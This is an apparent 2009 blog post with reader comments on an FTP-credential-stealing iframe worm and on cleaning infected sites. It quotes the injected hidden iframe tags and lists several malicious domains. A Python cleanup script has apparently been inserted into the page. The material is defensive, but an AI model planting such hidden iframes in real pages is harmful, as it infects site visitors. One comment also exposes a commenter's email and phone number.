iFrame worms: goooogleadsence.biz, cutlot.cn, google-ana1yticz.com, mixante.cn and similar
As you may have noticed, our site got infected 2 days ago. I managed to clean it in record time, maybe 20 minutes. However, a few of my other sites got infected heavily, so I need to restore backups for them, and at this moment some of them are still offline… For those who are interested, it was some variant of an iframe worm. It infected all index.php and .html files and a few others too. Basically it replaced the </body> in every index file on the server with the following code:
<iframe src="http://cutlot.cn/in.cgi?income49" width=1 height=1 style="visibility: hidden"></iframe>
</body>
Or, if a PHP index file is in question, it is added with an echo statement:
echo "<iframe src=\"http://goooogleadsence.biz/?click=B16BFB\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
In other cases the link in the iframe can be http://goooogleadsence.biz/?click=B16BFB, http://google-ana1yticz.com/?click=38951B or http://mixante.cn/in.cgi?income52. But people reacted fast, and it looks like both domains goooogleadsence.biz and google-ana1yticz.com are down.
At first I thought I had a server security breach, and then I realized that this thing is fucking my sites from my own computer. This worm infects your computer and then watches for FTP connections and your username and password. When it gets them, it starts to infect every index file that you, as that user, have the right to write. I am also not sure whether it watches for typed-in passwords.
What I did to remove it:
I restarted Windows in safe mode, ran a NOD32 full scan and cleaned a few strange tmp files. Then I booted into my Mandriva and changed all control panel and FTP passwords for all my infected sites (I still need to change the database passwords). I changed all crucial passwords for Gmail, GoDaddy and Moniker, the passwords that are important to me. There is no chance of changing passwords for all the forums and sites I am registered on. After the password changes I restored my last active public_html backups.
For those sites for which I don’t have a backup I opened every index.html and removed the code manually. On WordPress sites the worm will also infect default-filters.php and maybe a few other files.
I ran Clam Antivirus from my cPanel (this depends on the hosting) and it detected all infected files; I wrote down that list and, as I said, manually removed the malicious code. Be aware that Clam cannot clean files, only delete them. If WordPress or another CMS is affected, you can also download a clean copy and overwrite all files. Also it looks that
That is what I did. I am not sure whether this thing will come back, nor whether this text will help you.
This worm is very dangerous for webmasters because if you don’t react immediately you can be listed by Google as “This site can harm your computer”. If that happens it will ruin your traffic in a second.
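One way to find and strip the injected tag across a whole public_html tree, as an added example (my code, not the post's or any cleaner linked in the comments); it assumes Python 3.9+, and the sample strings and the regex are constructed from the two tags quoted above. It handles both the bare HTML variant and the PHP echo variant, leaves the </body> tag in place, and keeps a .bak copy of every file before writing so an over-broad pattern cannot cost content.

```python
"""Find and strip the hidden 1x1 iframe this post describes from index files.
Added example, not the post's or any linked cleaner; the regex and the sample
strings are mine, built from the tags quoted in the post."""
import re
from pathlib import Path

# Injected tag: src in (optionally backslash-escaped) quotes, width=1 height=1,
# a style hiding it. The src is captured so the report shows the domain used.
HIDDEN_IFRAME = (
    r'<iframe\s+src=\\?["\']?(?P<src>https?://[^"\'\s\\>]+)\\?["\']?'
    r'[^>]*?width=1\s+height=1[^>]*?visibility:\s*hidden[^>]*>\s*</iframe>'
)
IFRAME_RE = re.compile(HIDDEN_IFRAME, re.IGNORECASE)
# PHP index files carry the tag inside an echo statement; drop the whole statement.
ECHO_RE = re.compile(r'echo\s+"\s*' + HIDDEN_IFRAME + r'\s*";[ \t]*\n?', re.IGNORECASE)

# Constructed samples reproducing the two shapes quoted in the post.
SAMPLES = {
    "index.html": '<p>site</p><iframe src="http://cutlot.cn/in.cgi?income49" width=1'
                  ' height=1 style="visibility: hidden"></iframe>\n</body>',
    "index.php": 'echo "<iframe src=\\"http://goooogleadsence.biz/?click=B16BFB\\" width=1'
                 ' height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";\n?>',
}

def clean_text(text: str) -> tuple[str, list[str]]:
    """Return (cleaned text, src URLs removed); only the matched tag goes, </body> stays."""
    removed: list[str] = []
    for pattern in (ECHO_RE, IFRAME_RE):  # echo variant first, else the bare tag leaves echo "";
        text = pattern.sub(lambda m: removed.append(m.group("src")) or "", text)
    return text, removed

def scan_tree(root: Path, fix: bool = False) -> dict[str, list[str]]:
    """Report {relative path: [src, ...]} for index*.html/.htm/.php and WordPress's
    default-filters.php under root. With fix=True the cleaned file is written and the
    original kept as <name>.bak, so an over-broad pattern never costs content."""
    report: dict[str, list[str]] = {}
    for path in root.rglob("*"):
        wanted = path.name.startswith("index") or path.name == "default-filters.php"
        if not (wanted and path.suffix in {".html", ".htm", ".php"} and path.is_file()):
            continue
        original = path.read_text(encoding="utf-8", errors="surrogateescape")
        cleaned, srcs = clean_text(original)
        if not srcs:
            continue
        report[str(path.relative_to(root))] = srcs
        if fix:  # keep a copy before touching anything; test on a copy of the site first
            path.with_name(path.name + ".bak").write_text(original, encoding="utf-8", errors="surrogateescape")
            path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return report

if __name__ == "__main__":  # demo over the samples; on a real tree call scan_tree(Path("public_html"), fix=True)
    for name, text in SAMPLES.items():
        print(name, "->", clean_text(text)[1])
```

Run it without --fix first (fix defaults to False) and read the report; only then re-run with fix=True.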
[...] is my article about this pest hope it will get some traffic iFrame worms: goooogleadsence.biz, cutlot.cn, google-ana1yticz.com, mixante.cn and similar | Sulumit… __________________ Evil Science :: Sanovnik :: Sulumits [...]
Pingback by Net Builders SEO Contest - Page 64 - Net Builders — April 10, 2009 @ 7:37 am
They are using MD5 now and generating JavaScript code instead of using these simple codes.
Some of the new ones which are still on my servers are:
xtrarobotz .com
live-counter .net
hyperliteautoservices .cn
namebuypicture .cn
superbetfair .cn
And what I found out is that they are mainly attacking FTP applications.
Comment by sagbee — April 10, 2009 @ 8:22 am
I’m also infected; all my websites have the iframe and link to mixante.cn.
Thanks for this information.
Comment by Eric — April 10, 2009 @ 2:19 pm
Thanks Sagbee. This is becoming a real threat. Does anyone know how to confirm 100% that our PC is clear and safe? I am scared to log in to my sites from Windows again.
Comment by admin — April 10, 2009 @ 6:24 pm
Make sure to keep your antivirus + antispyware updated!!!
And regarding being 100% sure, I still don’t get it, but I found out that IF YOU ever leave any code behind, within 12 hours they will inject it again and will start with new iframe worms.
In WordPress check the wpau-backup folder, or maybe delete it, and in your wp-theme check every file since every theme has some custom things…
Be sure, and be very sure, to delete every one of these shit iframe links, plus find another bug which starts with "if(!function_exists"
Delete that one too…
Use SFTP, if you guys know about it.
And guys, if you find anything new, update it; it’s such a big pain in the ass if you have more than 300 websites and you have to do everything manually…
Anyway, I got one more: lotmachinesguide .cn
Thanks
/sagbee
Comment by Sagbee — April 10, 2009 @ 8:42 pm
ehha got bugs in wp-config and wp-config-sample.php too
Comment by sagbee — April 10, 2009 @ 9:24 pm
Argh. I just got it on some of my sites too, sites that I have not used for ages. Can it be a server problem? My computer is clean. What if the root user has an infected PC?
Comment by Prophet — April 11, 2009 @ 8:29 pm
Here are the files which got infected on the WordPress platform:
public_html/index.php
public_html/wp-includes/default-filters.php
public_html/wp-content/index.php
public_html/wp-content/themes/THEMEFOLDER/index.php
public_html/wp-admin/index.php
public_html/wp-admin/index-extra.php
Exploit.HTML.IFrame-6
Comment by Hellas — April 11, 2009 @ 9:19 pm
Ok thanks for the information lol, can I know on which sites the majority of them are present?
Comment by Balaji — April 12, 2009 @ 8:11 am
I Also Found This Virus In My Web Site Please Give Me The Solution For How To Remove This Virus This Is My Site http://www.dhyansanjivani.com Email Me : ravi_hhh50@hotmail.com My Contact No ( 91 9892745771
Comment by Ravi Singh — April 12, 2009 @ 6:59 pm
There is the virus Trojan-Downloader.JS.Agent.
It looks in the Windows registry for the location of the file wcx_ftp.ini.
That file (from Total Commander / Windows Commander) stores the FTP sites (hosts/users/passwords).
The passwords can be easily decrypted and from this point on you can have access to that FTP. In case the FTP is accessible from anywhere (no IP restriction) then at some point you might get the files index*.html, index*.php, default.asp altered (with that iframe thing in them).
The best advice is to:
1. clean your pc;
2. change the ftp passwords;
3. search and remove all the iframes from your files (from the server).
Good Luck !
Comment by Tom — April 13, 2009 @ 7:37 pm
We got this problem too. I never use Total Commander, I use FileZilla instead. Is it possible they hacked this too?
Comment by teun — April 14, 2009 @ 1:44 pm
Yes, it looks like FileZilla is hacked too. So is WS_FTP LE on my PC.
Comment by admin — April 14, 2009 @ 3:37 pm
I had this problem too. My computer was infected 2 days before NOD32 added this type of worm to its database.
After manually cleaning a site made in Joomla, and my fingers bled from all those index.html files in absolutely every directory, I discovered that the infected computer had a lot more FTP addresses stored and every single one of them was infected, and then I made a script to do this cleaning for me.
I’ve made this script just for the types of iframe that appeared in my files.
Here you can find the PHP file.
It is renamed .php1 because I wasn’t allowed to upload PHP files.
Copy the file to the root of your website and just run it from a browser.
It isn’t too much of a script but it does its job.
If you have another kind of iframe, feel free to modify my code without any restrictions.
Here is the link.
http://rapidshare.com/files/221271583/clean.php1.html
I hope it will help you
Comment by Dragos — April 14, 2009 @ 4:40 pm
Unbelievable! Thank you so much for this piece of code. You saved my life! But I must add a notice: if someone puts the wrong worm code in your script it will ruin his whole site. I just deleted the content from one of my sites with this,
luckily I had a backup. All you guys, test the right code offline, then when it works upload it to the server and run it!
Once more, thanks Dragos
you saved my day!
Comment by Creep Boy — April 14, 2009 @ 6:03 pm
Can you update this iframe trojan removal tool with a simple graphical interface,
so we can enter the iframe code it needs to remove from our .php and .html sites?
Comment by Creep Boy — April 14, 2009 @ 6:06 pm
Uhmm @ Dragos, seems like the RapidShare limit is already reached… can anyone send me another download link?
Thanks
Comment by Sagbee — April 15, 2009 @ 7:07 am
hello,
I had this problem. On every index on my site there was iframe code. I cleaned it manually and scanned my PC – the infection was found in the Opera cache and deleted. Haha, I thought I was the winner. I didn’t change the password on FTP either. The infection came again…
Now the indexes are cleaned, my PC and the FTP files of the affiliate system scanned and clean, the password on FTP still old. NOD alerts about the infection again but I don’t know where the trojan is. I have on the same FTP my main web, an affiliate system (the warning is on a few subdomain URLs) and an eshop (QuickCart). I have no solution.
Comment by jurass — April 15, 2009 @ 6:24 pm
RE: “then I realized that this thing is fucking my sites from my own computer”
I think this is an incorrect assumption.
I have not FTPd into my sites for about 6 months, yet I just found this IFRAME added to every index.html on the site. It updated the pages on April 9 at 6:00am.
Could be they somehow managed to hack PHP on the server side? It definitely looks like a server-side hack.
Comment by JoeGaggs — April 16, 2009 @ 9:06 am
The sequence of events is apparently this:
1) Server is hacked and index.html files are updated.
2) Users visit site and load index.html which downloads a malicious SWF and PDF file.
3) The PDF and SWF files hold the malware/virus.
Comment by JoeGaggs — April 16, 2009 @ 9:09 am
If it is a server-side hack, why are not all sites on my server hacked, just mine?
Comment by admin — April 16, 2009 @ 10:08 am
Hey, I can suggest http://www.hackalert24.com for such cases!
I also had the same problem, several times – my website was hacked. JavaScript code, which included a virus from a Chinese webserver with an iframe. In one case my provider didn’t have a clean backup, so it was a lot of work to remove the infections.
I have been using the hackalert hack monitoring service for some weeks now, and I can’t tell you how secure I’m feeling now.
Comment by Leo — April 16, 2009 @ 12:42 pm
Anyone tried that hackalert24 site?
Comment by John — April 16, 2009 @ 9:39 pm
[...] google-ana1yticz.com, mixante.cn worms. You can read my problems with this worms in one of my previous posts, also there is bunch of useful comments there… My server antivirus detects them all as [...]
Pingback by iframe worms: xtrarobotz.com, superbetfair.cn, lotmachinesguide.cn | Sulumits Retsambew — April 18, 2009 @ 1:42 pm
I just posted new article with the removal tools by Dragos here
http://www.sulumitsretsambew.org/iframe-worms-xtrarobotzcom-superbetfaircn-lotmachinesguidecn/
Comment by admin — April 18, 2009 @ 1:54 pm
[...] is the new variant of the iframe virus check it here iFrame worms: goooogleadsence.biz, cutlot.cn, google-ana1yticz.com, mixante.cn and similar | Sulumit… iframe worms: xtrarobotz.com, superbetfair.cn, lotmachinesguide.cn | Sulumits Retsambew and [...]
Pingback by Wierd, brand new proxy site iframed on some random site - Net Builders — April 19, 2009 @ 7:38 am
I asked friends to come register on my site and two days later we’ve all got web0scabies. I am so embarrassed. The hidden iframe first went to an IP address, and I cleaned that up, 17 domains on two hosts; desktop and laptop seemed clean. Till 15 hours later, when a friend alerted me her Spybot got Hupigon13 (trojan) and Zlob.Downloader (malware) so far. I found a new hidden iframe, this time going to a litecartop.cn address. The URL isn’t popping up on searches as one of the known nasties yet, but I’m sure it will; it follows the pattern with the word income and digits in the URL.
Anyway, now.. how do I only see the iframe tag, but my viewing members somehow get things downloading? What should I tell my members to look for?
Comment by embarrassed — April 22, 2009 @ 7:33 am
Many of my blogs were infected, including WordPress, Joomla, Drupal, Gallery and even a static site.
I use CuteFTP. But I had not logged into my account for a really long time. My webhost said this was caused by insecure plugins or old backup copies of WordPress. That could be the cause of the problem. My computer has NOD32 and is regularly updated. It is unlikely I’d get a virus…
Anyways, here is the code injected into my index files…
[code]
<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./blog/wp-blog-header.php');
/* the three echo statements below are the injected ones; their string contents did not survive posting */
echo "";
echo "";
echo "";
?>
[/code]
I'm gonna reinstall wordpress. That is the only way out.
Comment by Gauhar — April 23, 2009 @ 12:54 pm
For all of those thinking that their antivirus is great and that they could not have been hacked… Think again. I just spent a week changing passwords and cleaning files for over 150 web sites on 13 servers. The infection came from a .pdf file that uses a vulnerability in Acrobat. (Adobe has released an update to fix this – Microsoft has also recently released a patch.) Even with AV on the system, it is too late once you open the .pdf file. It went through every connection in my CuteFTP Pro. The only way to prevent this is to not use an automatic login. Type in the password each time you have to FTP. This thing is nasty – even after cleaning my system, the virus hid itself within the Windows stack processes and reinfected me 36 hours later. I’ve been cleaning viruses on clients’ computers for the last 12 years. Never seen one that I could not fully remove. The only way I knew it was still there was that I could not do a final Windows update. The only resolution is a flat install of Windows (format the hard drive – I purchased a new hard drive just to make sure). Good luck, but know it is a nasty virus.
Comment by Aynonmous — April 24, 2009 @ 5:47 am
One more attack on my websites. This time it’s different…
94.247.2.195/jquery.js threat JS/Exploit.Agent.AGR trojan
I can’t find it… Now what do I do?
Comment by Gauhar — April 24, 2009 @ 11:59 am
bigtopliteworld.cn/index.php
A new fuckin virus! It attacked my site recently and my index.php was removed and I need to upload it again!
Comment by Virgil — April 25, 2009 @ 1:15 am
There must be some universal cure to stop these threats.
Comment by admin — April 25, 2009 @ 8:53 am
There is one more solution to prevent all this: change the permissions from 755 to 444; that way nothing will be executed from your index page. At least it works for the WordPress platform…
Comment by sagbee — April 25, 2009 @ 10:54 am
sagbee… that can be tried. I’ll see if it produces any negative results in the functionality of WordPress…
Comment by Gauhar — April 27, 2009 @ 9:21 am
Thank you all guys. You saved my job!
Comment by perikle — April 27, 2009 @ 10:13 am
Hey guys,
I run a server, and unfortunately it got infected by a virus (iframe). I really don’t know what I should do, since almost all my websites have been infected, and even the direct admin pages!!!! So strange!
Please, can anyone help me here!
Also, can you please update the RapidShare PHP cleaner? The link given is broken.
many thanks guys!
regards
Comment by Rahim — May 5, 2009 @ 1:59 pm
Check this post,
I uploaded the removal tool there:
http://www.sulumitsretsambew.org/iframe-worms-xtrarobotzcom-superbetfaircn-lotmachinesguidecn/
Comment by admin — May 5, 2009 @ 4:36 pm
I have yet to determine if this is a PC virus or some kind of injection attack at the server, but it definitely uses FTP.
If you can, set your hosting to only allow FTP access from specific IP addresses or ranges. At least this will prevent use of FTP to do the attack.
If you use CPanel/WHM and have full access, you can do this. Otherwise you could ask your hosting provider to do so.
Comment by John — June 13, 2009 @ 9:23 pm
It appears to be a PC virus that will read your FTP login information from various FTP programs like CuteFTP, FileZilla, etc. I added a password to open CuteFTP … Tools > Global Options > Security > Encrypt Site Manager … and haven’t had an issue since. I also upgraded my security on my PC with PC Tools Free Firewall, and added Avast along with AVG to make sure it doesn’t happen again. So far, so good.
Comment by Tim — June 14, 2009 @ 4:45 pm
I think this post and the related one said it all…
Comment by miklosz — June 14, 2009 @ 4:51 pm
I cleaned up all the files infected in my wordpress…
The site looked great… 3 days later, got hacked again (definitely not server side, I had made the necessary changes; they used FTP from FileZilla for sure).
Just changed FTP and cleaned files.
All looks good, except:
I log in to my admin in WordPress and only “Tools” appears in the nav. Can’t write or edit posts. Just disappeared.
Went in through phpMyAdmin to see if the user still had admin access… apparently it does.
Made sure all wp-admin files were not infected, basically replaced them with a brand new WordPress download (same version 2.8), and still cannot access any other actions in the dashboard logged in as admin other than “Tools”.
Anyone think they know what the issue is? I need help
Thx!
Comment by oggy — June 19, 2009 @ 3:41 am
Hmm, I had a similar issue, but overwriting all WordPress files with newer ones fixed the thing.
Comment by admin — June 19, 2009 @ 8:02 am
Here is a great article on how to get rid of this virus:
http://www.qualitycodes.com/tutorial.php?articleid=29
Comment by Mat — August 6, 2009 @ 6:03 pm
Similar issue… I use the tool Iframe.Attack to remove the injection:
http://kawablog.com/scarabox/product.php?id_produit=1&id_rub=2&lng=en
Demo on YouTube:
http://www.youtube.com/watch?v=XosRuSk_NFg
regards, Sam
Comment by Sam — October 11, 2009 @ 11:08 am